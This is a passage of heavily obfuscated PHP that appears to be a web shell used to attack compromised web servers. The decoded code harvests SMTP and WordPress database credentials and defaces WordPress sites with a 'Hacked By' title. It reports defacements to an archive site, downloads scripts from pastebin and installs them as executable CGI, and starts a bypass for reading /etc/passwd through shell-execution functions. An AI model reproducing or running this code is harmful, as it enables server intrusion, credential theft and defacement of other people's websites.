"\123\x4d\x54\x50\40\x70\157\162\x74\72\x20\x3c\x66\x6f\x6e\x74\x20\x63\x6f\154\157\162\x3d\154\x69\x6d\x65\x3e{$smtp_port}\x3c\57\x66\x6f\156\164\76\74\142\x72\x3e"; echo "\x53\115\x54\x50\x20\165\x73\145\x72\72\x20\74\146\x6f\156\164\40\x63\157\x6c\x6f\162\x3d\154\151\x6d\x65\76{$smtp_user}\x3c\x2f\146\x6f\x6e\x74\76\74\x62\x72\x3e"; echo "\123\115\124\120\x20\x70\141\x73\x73\72\40\74\146\157\x6e\164\40\143\157\x6c\x6f\x72\x3d\x6c\x69\x6d\145\x3e{$smtp_pass}\74\57\146\157\156\x74\76\74\142\162\x3e"; echo "\x53\115\124\x50\x20\141\165\x74\150\x3a\40\74\x66\x6f\156\x74\40\143\157\x6c\157\162\x3d\154\151\x6d\145\x3e{$smtp_auth}\74\x2f\x66\x6f\156\164\76\x3c\x62\x72\x3e"; echo "\x53\115\x54\x50\x20\x73\145\x63\x75\162\145\72\40\74\146\157\x6e\164\x20\143\x6f\154\x6f\162\75\154\151\x6d\x65\76{$smtp_secure}\x3c\57\x66\x6f\156\164\x3e\x3c\142\162\76\x3c\142\162\76"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif ($_GET["\144\x6f"] == "\x61\165\164\x6f\x5f\x77\160") { if ($_POST["\150\x61\152\141\162"]) { $title = htmlspecialchars($_POST["\156\145\x77\137\x74\151\x74\154\145"]); $pn_title = str_replace("\40", "\55", $title); if ($_POST["\143\x65\153\x5f\x65\x64\x69\164"] == "\x59") { $script = $_POST["\x65\x64\x69\x74\x5f\143\157\x6e\x74\145\x6e\x74"]; } else { $script = $title; } $conf = $_POST["\143\x6f\156\146\x69\147\137\144\x69\x72"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}\x2f{$file_conf}")) { continue; } $config = file_get_contents("{$conf}\x2f{$file_conf}"); if (preg_match("\57\127\x6f\162\144\x50\x72\145\x73\x73\x2f", $config)) { $dbhost = ambilkata($config, "\104\102\137\110\x4f\x53\124\47\54\x20\47", "\x27"); $dbuser = ambilkata($config, "\104\x42\x5f\125\x53\x45\122\47\x2c\40\x27", "\47"); $dbpass = ambilkata($config, "\x44\102\137\x50\101\x53\x53\127\117\x52\x44\x27\54\x20\x27", "\47"); $dbname = ambilkata($config, "\104\102\x5f\116\x41\115\x45\x27\x2c\x20\47", "\x27"); $dbprefix = ambilkata($config, "\x74\141\142\x6c\145\137\160\x72\x65\x66\x69\170\40\x20\x3d\x20\47", "\x27"); $prefix = $dbprefix . "\160\157\163\x74\x73"; $option = $dbprefix . "\x6f\x70\164\151\157\156\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\105\114\x45\x43\124\x20\52\40\106\x52\x4f\x4d\40{$prefix}\x20\x4f\x52\104\105\122\x20\102\x59\x20\x49\x44\x20\101\123\x43"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\x53\105\x4c\105\x43\x54\40\x2a\40\x46\122\x4f\x4d\40{$option}\x20\117\122\x44\x45\122\40\102\x59\40\x6f\x70\164\x69\157\156\137\x69\144\40\x41\x53\x43"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("\125\120\104\x41\124\x45\x20{$prefix}\40\123\x45\124\40\160\x6f\x73\164\137\x74\151\x74\154\x65\x3d\x27{$title}\x27\x2c\x70\157\163\x74\x5f\x63\157\156\164\x65\156\x74\75\47{$script}\x27\54\x70\x6f\x73\x74\x5f\x6e\141\x6d\145\x3d\x27{$pn_title}\x27\x2c\160\157\x73\x74\x5f\163\164\x61\x74\165\163\x3d\47\160\x75\142\x6c\x69\163\150\47\x2c\x63\x6f\155\155\x65\x6e\164\x5f\163\164\141\x74\165\x73\x3d\x27\157\160\x65\156\x27\x2c\160\x69\x6e\x67\137\x73\x74\141\x74\165\x73\x3d\x27\x6f\x70\x65\x6e\47\x2c\160\x6f\x73\164\137\164\x79\x70\x65\75\47\x70\157\x73\164\47\54\x63\157\x6d\155\x65\156\x74\137\x63\x6f\165\x6e\x74\75\x27\61\x27\40\x57\110\x45\x52\x45\40\151\x64\x3d\47{$id}\47"); $update .= mysql_query("\x55\120\x44\101\124\x45\x20{$option}\x20\123\105\124\x20\x6f\160\164\x69\157\x6e\137\166\141\154\165\x65\75\x27{$title}\47\40\127\x48\x45\x52\x45\40\157\160\164\x69\157\x6e\137\156\x61\x6d\x65\x3d\47\x62\154\x6f\147\x6e\141\155\x65\x27\40\x4f\122\40\157\x70\x74\x69\x6f\156\x5f\x6e\x61\155\x65\75\47\142\154\x6f\147\x64\x65\x73\x63\x72\x69\x70\x74\151\157\x6e\47"); echo "\74\144\x69\x76\x20\x73\x74\171\x6c\145\75\x27\155\x61\x72\x67\151\156\72\x20\65\160\170\x20\x61\x75\x74\x6f\x3b\x27\76"; if ($target == '') { echo "\125\122\x4c\72\40\x3c\146\157\x6e\164\40\143\x6f\x6c\x6f\x72\x3d\162\x65\x64\x3e\x65\162\162\157\162\54\x20\147\x61\142\x69\163\x61\40\141\155\x62\151\x6c\40\x6e\141\x6d\x61\x20\x64\x6f\x6d\x61\x69\156\x20\x6e\x79\141\x3c\57\146\157\x6e\164\76\x20\55\76\x20"; } else { echo "\125\122\114\x3a\40\x3c\x61\40\150\162\x65\146\75\47{$target}\57\x3f\x70\75{$id}\47\x20\x74\141\162\x67\145\164\x3d\x27\x5f\x62\154\x61\156\153\47\76{$target}\x2f\77\160\x3d{$id}\74\57\141\x3e\40\x2d\x3e\40"; } if (!$update or !$conn or !$db) { echo "\x3c\x66\157\x6e\x74\x20\143\157\154\x6f\x72\75\162\145\144\x3e\115\171\123\121\114\40\105\162\162\x6f\x72\72\x20" . mysql_error() . "\74\x2f\x66\157\x6e\x74\x3e\74\142\162\x3e"; } else { echo "\x3c\146\x6f\x6e\x74\40\x63\157\x6c\x6f\x72\75\x6c\x69\155\145\76\x73\x75\153\163\145\163\x20\144\x69\40\147\x61\x6e\164\x69\x2e\x3c\x2f\146\x6f\156\164\76\x3c\142\x72\76"; } echo "\x3c\57\144\x69\x76\x3e"; mysql_close($conn); } } } else { echo "\x3c\x63\145\x6e\164\x65\x72\x3e\12\11\x9\74\x68\61\76\101\x75\x74\x6f\x20\x45\144\151\164\40\x54\151\164\154\145\53\103\x6f\156\164\145\x6e\164\40\127\x6f\162\x64\x50\162\x65\x73\163\74\x2f\x68\61\x3e\xa\x9\x9\x3c\x66\157\162\155\x20\155\145\164\x68\157\144\75\47\160\157\163\164\47\76\12\11\x9\x44\111\x52\40\x43\157\x6e\146\151\147\x3a\x20\74\142\162\x3e\xa\11\x9\74\151\156\160\165\x74\40\164\x79\x70\x65\75\47\x74\x65\170\x74\x27\x20\x73\x69\172\145\x3d\47\65\60\x27\40\x6e\141\x6d\145\x3d\47\143\x6f\x6e\146\x69\x67\137\x64\x69\x72\47\x20\166\x61\x6c\x75\145\75\47{$dir}\x27\76\74\x62\x72\x3e\x3c\142\x72\76\xa\11\x9\x53\x65\164\x20\x54\151\164\x6c\145\72\x20\x3c\x62\x72\x3e\12\x9\x9\x3c\x69\156\x70\x75\x74\40\x74\x79\x70\145\75\47\164\145\x78\x74\47\40\156\x61\155\x65\75\x27\x6e\x65\x77\x5f\x74\151\164\154\145\x27\x20\166\x61\154\165\145\x3d\x27\110\x61\143\x6b\145\x64\40\x42\x79\40\123\x75\144\157\40\x46\x61\x6d\x69\x6c\x79\x27\x20\160\x6c\x61\x63\145\150\157\154\144\x65\x72\75\47\116\x65\167\x20\124\151\164\154\145\x27\76\x3c\142\162\76\x3c\x62\x72\x3e\12\x9\x9\x45\144\x69\x74\40\x43\x6f\x6e\x74\145\x6e\164\77\x3a\x20\x3c\x69\156\160\x75\x74\40\x74\x79\160\x65\x3d\x27\162\141\144\x69\157\47\x20\x6e\x61\155\x65\x3d\x27\143\x65\153\137\145\x64\x69\164\x27\x20\166\141\x6c\165\x65\75\47\131\x27\x20\x63\x68\x65\143\153\145\144\x3e\x59\x3c\151\156\160\165\164\x20\164\x79\x70\145\75\47\162\x61\x64\151\x6f\47\40\156\141\155\145\75\47\143\x65\x6b\x5f\145\144\151\x74\47\x20\166\x61\154\x75\x65\x3d\47\116\47\76\116\x3c\x62\162\76\12\11\x9\12\11\11\74\x74\x65\x78\164\x61\162\x65\141\40\156\141\155\145\75\47\x65\144\x69\164\137\143\157\156\x74\x65\156\164\47\40\160\154\141\x63\145\150\157\x6c\144\145\162\75\47\x63\157\x6e\164\x6f\x68\40\x73\x63\x72\x69\160\x74\72\40\x68\164\164\160\72\57\57\x70\x61\163\164\x65\142\151\156\x2e\x63\157\155\x2f\105\x70\120\x36\67\61\147\113\x27\40\x73\164\171\x6c\x65\75\x27\x77\x69\144\164\x68\72\40\64\65\x30\x70\x78\x3b\40\x68\x65\151\x67\150\164\x3a\x20\x31\65\x30\160\x78\x3b\47\76\74\57\x74\x65\170\x74\x61\x72\x65\141\x3e\74\142\x72\76\xa\x9\x9\74\151\156\160\x75\x74\x20\x74\171\160\x65\75\x27\x73\x75\142\155\x69\164\47\x20\x6e\141\155\145\75\47\150\x61\x6a\141\162\47\40\x76\x61\x6c\x75\x65\x3d\x27\150\141\143\x6b\47\40\163\x74\x79\x6c\145\x3d\x27\167\x69\x64\x74\150\72\x20\64\65\x30\x70\170\x3b\x27\x3e\x3c\142\162\76\xa\x9\x9\74\57\x66\157\x72\155\x3e\xa\11\x9\74\x62\162\x3e\12\x9\x9"; } } elseif ($_GET["\144\x6f"] == "\x7a\x6f\156\145\x68") { if ($_POST["\x73\x75\142\x6d\x69\164"]) { $domain = explode("\xd\xa", $_POST["\x75\162\154"]); $nick = $_POST["\156\x69\x63\x6b"]; echo "\104\145\146\x61\143\x65\162\40\117\156\150\157\154\144\72\x20\74\x61\x20\x68\162\x65\146\75\47\150\164\164\160\x3a\x2f\x2f\x77\167\167\56\172\157\x6e\x65\55\150\56\157\x72\147\57\141\162\x63\x68\x69\x76\145\x2f\x6e\x6f\164\151\146\x69\145\x72\75{$nick}\x2f\160\x75\x62\154\x69\x73\150\145\x64\x3d\60\47\40\x74\x61\x72\147\145\164\x3d\x27\x5f\142\154\x61\156\153\47\x3e\150\x74\164\160\x3a\57\x2f\x77\167\x77\56\x7a\x6f\156\x65\x2d\150\x2e\157\162\147\57\x61\x72\143\150\151\x76\x65\57\x6e\157\x74\x69\146\151\145\x72\75{$nick}\x2f\160\x75\x62\x6c\151\163\150\x65\x64\75\60\74\x2f\141\76\74\x62\162\76"; echo "\104\x65\146\x61\143\x65\x72\x20\101\162\x63\x68\151\166\145\72\40\x3c\x61\x20\150\x72\x65\x66\x3d\x27\150\164\164\x70\x3a\x2f\57\167\167\167\x2e\x7a\x6f\x6e\145\x2d\150\56\157\x72\147\x2f\141\x72\x63\x68\x69\x76\x65\x2f\x6e\x6f\x74\151\x66\151\145\x72\75{$nick}\47\x20\164\141\x72\x67\x65\164\75\47\x5f\142\x6c\141\x6e\x6b\x27\x3e\150\x74\164\160\72\57\57\x77\x77\x77\56\x7a\157\x6e\x65\55\150\x2e\157\x72\x67\x2f\141\162\143\x68\x69\166\145\x2f\x6e\157\164\151\x66\x69\145\x72\x3d{$nick}\74\57\x61\x3e\74\142\162\76\x3c\142\x72\76"; function zoneh($url, $nick) { $ch = curl_init("\x68\164\x74\160\72\57\57\x77\167\x77\56\172\157\x6e\145\55\x68\x2e\143\157\155\57\156\157\164\151\146\x79\57\163\151\156\x67\x6c\145"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "\144\x65\x66\x61\143\x65\x72\x3d{$nick}\46\144\157\x6d\x61\x69\156\x31\75{$url}\46\150\141\143\x6b\155\157\144\x65\x3d\61\x26\162\145\x61\x73\157\x6e\75\x31\46\163\165\x62\155\x69\x74\x3d\123\145\156\x64"); return curl_exec($ch); curl_close($ch); } foreach ($domain as $url) { $zoneh = zoneh($url, $nick); if (preg_match("\57\x63\x6f\154\x6f\x72\75\42\x72\x65\x64\42\x3e\117\113\x3c\x5c\x2f\x66\157\156\x74\x3e\74\134\x2f\x6c\x69\x3e\57\151", $zoneh)) { echo "{$url}\40\x2d\x3e\40\x3c\x66\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\x72\x3d\x6c\151\x6d\145\76\x4f\x4b\x3c\x2f\146\157\156\164\76\x3c\x62\x72\x3e"; } else { echo "{$url}\x20\x2d\x3e\x20\74\146\x6f\156\x74\40\143\157\154\x6f\162\x3d\162\x65\x64\76\x45\122\x52\117\x52\x3c\x2f\x66\157\156\164\x3e\x3c\142\x72\76"; } } } else { echo "\74\x63\145\x6e\164\145\x72\76\x3c\x66\x6f\x72\x6d\40\155\145\164\x68\157\144\75\x27\160\x6f\x73\164\47\x3e\xa\x9\11\74\165\76\x44\145\x66\141\143\145\x72\74\x2f\165\x3e\72\x20\74\142\162\76\xa\11\11\x3c\151\x6e\x70\165\x74\40\x74\x79\x70\x65\75\x27\164\145\170\x74\x27\40\x6e\x61\x6d\x65\75\x27\156\151\x63\153\47\x20\163\151\172\145\75\x27\x35\60\47\x20\166\x61\x6c\x75\145\47\113\x69\154\x6c\145\162\x30\x30\67\47\76\x3c\x62\162\76\12\x9\11\74\165\76\104\157\x6d\x61\x69\x6e\163\x3c\x2f\x75\x3e\x3a\x20\x3c\x62\x72\x3e\xa\x9\x9\x3c\x74\145\170\164\x61\162\x65\141\40\x73\x74\171\x6c\145\75\47\167\151\x64\164\x68\x3a\40\64\x35\x30\x70\170\x3b\40\x68\145\x69\147\150\x74\72\40\x31\65\x30\x70\x78\73\47\40\x6e\141\155\145\75\x27\x75\x72\154\47\x3e\x3c\57\164\x65\x78\x74\x61\162\x65\141\76\x3c\x62\162\76\12\11\11\74\x69\x6e\160\165\164\40\x74\x79\160\145\x3d\47\x73\165\142\x6d\x69\x74\x27\40\x6e\x61\x6d\145\x3d\x27\163\x75\x62\155\x69\x74\x27\40\x76\141\154\x75\x65\75\x27\x53\x75\x62\155\151\x74\x27\x20\x73\x74\171\154\145\x3d\x27\x77\x69\x64\x74\x68\x3a\x20\64\x35\x30\x70\170\x3b\47\x3e\xa\11\x9\x3c\x2f\x66\157\162\x6d\x3e"; } echo "\x3c\57\143\x65\156\164\x65\x72\76"; } elseif ($_GET["\144\157"] == "\x6c\x63\146") { mkdir("\x4c\x43\x46", 493); chdir("\x4c\103\x46"); $kokdosya = "\x2e\x68\164\141\x63\x63\145\x73\163"; $dosya_adi = "{$kokdosya}"; $dosya = fopen($dosya_adi, "\167") or die("\x45\162\162\157\x72\40\x6d\141\x73\x20\x62\x72\x6f\x6f\x21\x21\41"); $metin = "\117\120\124\x49\117\116\123\40\111\x6e\144\x65\170\145\163\x20\111\156\x63\x6c\165\144\x65\x73\x20\105\170\x65\143\103\107\x49\x20\x46\157\154\x6c\157\x77\123\171\155\x4c\151\x6e\x6b\163\11\xa\40\x41\x64\x64\x54\171\x70\x65\x20\x61\160\160\154\x69\143\x61\x74\151\x6f\156\57\170\x2d\x68\x74\164\x70\144\55\143\147\x69\x20\x2e\x70\154\x20\xa\x20\x41\144\144\110\141\x6e\144\x6c\x65\x72\40\x63\147\x69\55\163\x63\x72\151\160\164\x20\x2e\x70\154\40\xa\x20\101\144\x64\110\x61\x6e\x64\154\145\162\x20\143\147\x69\55\163\x63\162\151\x70\164\x20\x2e\160\x6c\12\xa\x20\12\x20\x4f\160\164\x69\x6f\156\163\x20\12\x20\x44\151\x72\x65\143\164\157\x72\171\111\156\144\x65\x78\40\163\145\x65\145\163\x2e\x68\164\x6d\x6c\x20\xa\40\122\145\x6d\157\166\145\110\141\156\x64\x6c\145\x72\40\56\x70\150\160\x20\12\40\x41\x64\144\124\171\x70\x65\x20\141\x70\x70\x6c\151\143\x61\x74\151\157\x6e\x2f\x6f\x63\x74\x65\164\x2d\x73\164\x72\x65\x61\x6d\x20\56\x70\x68\160"; fwrite($dosya, $metin); fclose($dosya); $file = fopen("\154\x63\x66\x2e\160\154", "\167\x2b"); $write = fwrite($file, file_get_contents("\150\x74\164\x70\72\57\x2f\x70\x61\163\x74\x65\142\x69\x6e\x2e\143\x6f\x6d\x2f\162\x61\x77\x2f\x32\x36\152\101\x4c\60\163\172")); fclose($file); chmod("\x6c\143\x66\x2e\x70\x6c", 493); echo "\x3c\151\x66\162\x61\155\x65\40\163\x72\x63\x3d\114\103\106\x2f\x6c\x63\146\56\x70\154\x20\167\x69\x64\164\150\75\71\x37\x25\x20\x68\145\151\x67\150\164\75\61\60\60\x25\40\146\162\x61\155\x65\142\x6f\162\144\145\162\x3d\60\76\74\x2f\151\146\x72\141\x6d\145\76"; } elseif ($_GET["\144\x6f"] == "\143\x67\151") { $cgi_dir = mkdir("\x69\144\170\137\x63\147\151", 493); $file_cgi = "\x69\144\170\x5f\143\147\151\x2f\x63\147\151\x2e\x69\x7a\x6f"; $isi_htcgi = "\101\144\144\110\141\156\x64\x6c\145\x72\40\x63\x67\x69\55\x73\143\x72\151\x70\164\40\56\x69\172\x6f"; $htcgi = fopen("\56\x68\x74\141\x63\143\145\163\x73", "\x77"); $cgi_script = file_get_contents("\x68\x74\x74\x70\72\x2f\57\x70\x61\x73\164\x65\x62\x69\x6e\x2e\x63\157\x6d\x2f\x72\x61\x77\56\x70\x68\160\77\x69\75\130\x54\125\106\x66\112\114\147"); $cgi = fopen($file_cgi, "\x77"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); echo "\x3c\x69\x66\x72\x61\x6d\x65\x20\163\162\x63\x3d\47\x69\x64\170\x5f\x63\x67\x69\57\143\147\151\56\x69\172\x6f\47\40\x77\151\144\x74\150\75\47\61\60\x30\45\x27\x20\150\145\x69\x67\150\164\75\47\x31\60\60\45\47\40\x66\162\x61\x6d\145\142\x6f\162\144\145\162\75\47\x30\x27\40\163\x63\162\157\x6c\154\151\156\x67\x3d\x27\156\157\47\76\x3c\57\151\x66\x72\x61\x6d\145\x3e"; } elseif ($_GET["\144\x6f"] == "\146\x61\x6b\145\x5f\162\x6f\157\164") { ob_start(); function reverse($url) { $ch = curl_init("\150\164\164\160\x3a\x2f\x2f\144\157\x6d\x61\x69\156\x73\x2e\171\157\165\x67\145\x74\x73\151\x67\156\x61\154\x2e\143\157\x6d\x2f\144\157\155\141\x69\156\x73\x2e\x70\150\x70"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "\x72\x65\x6d\x6f\164\145\101\x64\x64\162\145\163\163\75{$url}\x26\153\x65\x74\75"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("\x5b", '', str_replace("\x5d", '', str_replace("\x22\x22", '', str_replace("\54\40\54", "\54", str_replace("\x7b", '', str_replace("\173", '', str_replace("\175", '', str_replace("\54\40", "\x2c", str_replace("\x2c\40", "\54", str_replace("\x27", '', str_replace("\x27", '', str_replace("\72", "\54", str_replace("\x22", '', $resp))))))))))))); $array = explode("\54\54", $resp); unset($array[0]); foreach ($array as $lnk) { $lnk = "\x68\164\164\x70\x3a\x2f\57{$lnk}"; $lnk = str_replace("\54", '', $lnk); echo $lnk . "\12"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("\57", $cwd); $user = $ambil_user[2]; if ($_POST["\x72\145\166\145\x72\163\145"]) { $site = explode("\15\xa", $_POST["\x75\x72\154"]); $file = $_POST["\x66\x69\154\145"]; foreach ($site as $url) { $cek = cek("{$url}\x2f\176{$user}\x2f{$file}"); if (preg_match("\x2f\150\x61\x63\153\x65\x64\57\x69", $cek)) { echo "\125\122\x4c\72\40\74\x61\40\150\x72\x65\x66\x3d\47{$url}\x2f\176{$user}\x2f{$file}\47\x20\x74\141\x72\147\145\164\75\47\x5f\142\154\x61\x6e\x6b\x27\x3e{$url}\x2f\x7e{$user}\x2f{$file}\x3c\x2f\x61\76\x20\55\76\x20\74\146\x6f\156\x74\40\143\157\154\x6f\162\x3d\x6c\x69\x6d\x65\x3e\x46\141\x6b\x65\40\x52\x6f\x6f\164\x21\74\x2f\146\157\x6e\x74\76\74\142\x72\76"; } } } else { echo "\74\x63\145\x6e\164\145\162\x3e\74\x66\x6f\x72\x6d\x20\x6d\145\x74\150\x6f\144\75\x27\x70\157\x73\x74\47\76\12\x9\11\106\x69\x6c\145\x6e\x61\x6d\145\x3a\40\x3c\142\x72\76\x3c\x69\156\x70\165\x74\40\x74\x79\x70\x65\75\47\164\x65\x78\164\47\x20\x6e\x61\155\x65\x3d\47\146\x69\x6c\145\x27\x20\166\x61\x6c\165\145\75\47\x64\145\146\141\x63\x65\56\150\164\155\x6c\47\40\163\151\172\x65\75\x27\x35\60\47\x20\x68\x65\151\x67\150\164\x3d\x27\61\x30\x27\x3e\74\x62\x72\76\12\11\11\x55\x73\145\x72\x3a\40\74\x62\x72\x3e\x3c\x69\x6e\x70\165\164\x20\164\171\x70\x65\x3d\47\164\145\170\x74\47\x20\x76\141\x6c\x75\x65\75\47{$user}\x27\40\163\x69\x7a\x65\x3d\x27\x35\60\47\x20\150\x65\x69\147\150\164\75\x27\x31\x30\x27\40\162\145\141\144\x6f\x6e\x6c\x79\x3e\x3c\x62\162\x3e\xa\11\11\x44\157\155\x61\x69\156\72\40\74\142\162\x3e\xa\x9\11\74\x74\x65\x78\x74\x61\162\x65\141\40\x73\164\171\154\145\x3d\47\167\x69\144\164\x68\x3a\x20\64\x35\60\x70\x78\73\40\150\145\151\x67\150\x74\72\40\x32\65\60\160\x78\x3b\x27\x20\x6e\141\155\x65\x3d\x27\165\162\154\47\x3e"; reverse($_SERVER["\110\124\124\120\x5f\x48\x4f\x53\x54"]); echo "\x3c\x2f\164\145\x78\164\141\162\x65\141\x3e\x3c\x62\162\76\12\x9\11\74\x69\x6e\160\x75\x74\40\x74\171\x70\x65\x3d\x27\163\165\x62\x6d\x69\x74\x27\40\156\x61\155\x65\x3d\x27\162\x65\x76\x65\x72\x73\x65\x27\40\166\141\x6c\165\145\75\x27\x53\x63\141\156\x20\x46\141\153\x65\40\x52\x6f\x6f\x74\41\x27\40\163\164\171\154\145\75\x27\x77\x69\x64\164\150\72\40\64\x35\x30\160\x78\73\47\x3e\12\x9\11\74\57\x66\x6f\x72\155\76\x3c\x62\162\76\12\11\x9\x4e\102\x3a\40\123\145\142\x65\154\x75\155\x20\x67\165\x6e\141\x69\x6e\40\x54\157\157\154\163\x20\151\x6e\x69\x20\x2c\40\165\x70\154\x6f\141\x64\40\x64\x75\154\165\40\146\151\154\x65\40\x64\x65\x66\141\143\145\40\x6b\141\x6c\151\141\x6e\x20\144\151\x20\144\151\162\x20\57\x68\x6f\155\145\57\x75\x73\x65\x72\x2f\40\144\x61\156\x20\57\150\157\x6d\x65\57\x75\163\145\162\x2f\160\165\142\x6c\x69\143\137\x68\x74\155\x6c\56\74\57\x63\145\156\x74\x65\162\x3e"; } } elseif ($_GET["\x64\x6f"] == "\141\144\155\151\156\145\162") { $full = str_replace($_SERVER["\104\117\x43\125\x4d\105\x4e\124\137\122\117\x4f\x54"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "\x77"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("\141\144\x6d\151\156\145\x72\x2e\x70\150\x70")) { echo "\x3c\143\145\156\164\145\162\76\74\146\157\x6e\164\x20\143\x6f\154\157\x72\x3d\154\151\155\x65\x3e\x3c\141\40\150\x72\x65\146\x3d\x27{$full}\57\141\144\155\x69\156\x65\x72\56\160\150\160\x27\x20\164\141\x72\x67\145\164\x3d\x27\x5f\x62\154\x61\156\153\x27\x3e\x2d\76\x20\141\144\x6d\151\x6e\x65\162\40\x6c\157\147\151\156\40\74\55\x3c\57\141\x3e\74\x2f\146\157\x6e\x74\76\74\57\143\145\x6e\x74\145\162\76"; } else { if (adminer("\x68\x74\164\160\x73\72\57\57\167\x77\x77\x2e\x61\144\x6d\x69\x6e\145\162\x2e\x6f\162\x67\57\x73\x74\141\x74\151\143\x2f\144\157\x77\156\x6c\x6f\141\144\x2f\64\x2e\62\56\x34\57\141\x64\155\x69\x6e\x65\x72\55\64\x2e\x32\56\x34\x2e\160\150\160", "\x61\x64\x6d\x69\x6e\145\x72\x2e\160\150\160")) { echo "\74\x63\145\x6e\164\145\x72\76\74\x66\x6f\156\164\40\x63\157\x6c\x6f\x72\75\154\x69\155\145\76\74\x61\x20\150\162\x65\146\75\47{$full}\x2f\x61\x64\155\151\156\x65\162\56\160\x68\x70\47\40\164\141\162\x67\x65\164\x3d\x27\x5f\142\154\141\x6e\153\x27\x3e\x2d\x3e\40\141\x64\155\151\156\145\162\x20\x6c\x6f\x67\x69\156\x20\74\x2d\74\x2f\141\76\74\57\x66\x6f\x6e\x74\x3e\x3c\57\143\x65\x6e\164\145\x72\76"; } else { echo "\74\x63\x65\x6e\x74\x65\162\76\x3c\x66\x6f\x6e\164\40\x63\157\154\x6f\x72\x3d\162\145\x64\x3e\147\141\x67\x61\154\40\x62\x75\141\x74\x20\x66\x69\x6c\x65\x20\x61\144\x6d\x69\x6e\x65\162\x3c\x2f\x66\x6f\156\164\76\x3c\x2f\x63\x65\156\x74\x65\162\76"; } } } elseif ($_GET["\144\x6f"] == "\160\x61\x73\163\x77\142\171\160\141\x73\x73") { echo "\x3c\x63\145\x6e\164\x65\162\76\102\171\x70\141\163\x73\x20\145\x74\143\57\160\141\163\163\167\40\x57\151\x74\150\x3a\74\x62\x72\x3e\xa\74\x74\x61\x62\x6c\145\40\x73\x74\x79\x6c\145\75\42\167\x69\144\164\150\x3a\65\60\x25\x22\x3e\xa\x20\x20\x3c\164\162\x3e\12\40\40\x20\40\x3c\164\x64\76\x3c\x66\157\162\x6d\x20\155\x65\x74\150\157\x64\75\42\x70\x6f\x73\164\42\76\74\151\x6e\x70\x75\x74\x20\164\x79\160\x65\75\x22\x73\x75\142\155\151\164\x22\x20\x76\141\154\165\145\75\x22\123\x79\x73\x74\145\x6d\x20\x46\x75\x6e\143\164\151\x6f\156\42\x20\x6e\141\x6d\145\x3d\42\163\x79\x73\x74\x22\x3e\74\x2f\146\x6f\162\155\x3e\74\57\x74\x64\x3e\xa\40\x20\40\x20\74\x74\x64\76\74\x66\157\x72\155\40\155\145\x74\x68\x6f\x64\x3d\x22\160\x6f\x73\x74\42\76\x3c\151\156\x70\165\x74\40\164\171\160\145\75\x22\x73\x75\x62\155\151\x74\42\40\166\141\x6c\x75\145\x3d\x22\x50\x61\163\x73\x74\150\162\x75\x20\106\165\156\x63\x74\x69\x6f\156\42\40\x6e\x61\155\x65\75\42\160\x61\x73\x73\164\x68\42\x3e\74\x2f\x66\x6f\x72\155\x3e\74\x2f\164\x64\x3e\xa\x20\40\x20\40\74\x74\144\76\74\x66\157\162\x6d\x20\155\x65\164\150\157\144\75\42\x70\x6f\163\x74\x22\76\74\x69\156\x70\165\x74\x20\164\x79\x70\145\x3d\x22\163\x75\x62\x6d\x69\164\x22\x20\x76\x61\x6c\165\x65\75\42\105\170\x65\x63\x20\x46\165\156\143\x74\151\157\x6e\x22\x20\156\x61\x6d\145\75\x22\145\x78\42\76\74\x2f\x66\157\x72\155\76\74\x2f\x74\144\x3e\11\12\40\x20\40\x20\x3c\x74\x64\76\x3c\146\157\162\155\40\155\x65\x74\150\x6f\x64\x3d\42\x70\x6f\163\x74\x22\x3e\x3c\151\156\x70\165\x74\40\x74\x79\x70\x65\75\42\163\x75\142\155\x69\164\42\x20\x76\x61\154\x75\145\x3d\x22\x53\150\x65\x6c\154\137\x65\170\145\143\40\106\165\x6e\x63\164\x69\x6f\x6e\42\x20\x6e\141\155\x65\75\x22\x73\150\x65\170\x22\76\74\x2f\146\x6f\x72\155\76\74\x2f\x74\x64\76\11\11\12\x20\x20\40\x20\74\x74\x64\76\x3c\146\x6f\x72\155\40\155\145\164\150\157\144\x3d\42\x70\157\163\164\x22\76\74\x69\156\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\163\165\142\155\151\164\x22\x20\166\x61\154\x75\x65\75\x22\x50\157\163\x69\170\137\147\x65\164\x70\167\x75\151\144\40\106\165\156\x63\164\x69\x6f\x6e\x22\x20\x6e\x61\x6d\145\x3d\42\x6d\x65\154\145\170\42\x3e\74\57\146\157\x72\155\x3e\x3c\x2f\164\144\x3e\xa\x3c\x2f\x74\x72\x3e\x3c\57\164\x61\x62\x6c\x65\76\x42\x79\x70\x61\x73\x73\40\x55\x73\x65\x72\40\127\x69\164\x68\40\x3a\40\74\x74\141\x62\x6c\x65\40\163\164\171\154\145\75\x22\167\x69\x64\x74\x68\72\65\x30\45\42\x3e\12\x3c\164\162\x3e\12\x20\40\x20\x20\x3c\164\x64\x3e\x3c\x66\157\162\x6d\40\155\x65\x74\150\x6f\x64\x3d\42\x70\157\x73\x74\42\x3e\x3c\x69\x6e\x70\x75\x74\40\x74\x79\x70\145\x3d\x22\x73\165\142\155\x69\x74\x22\x20\x76\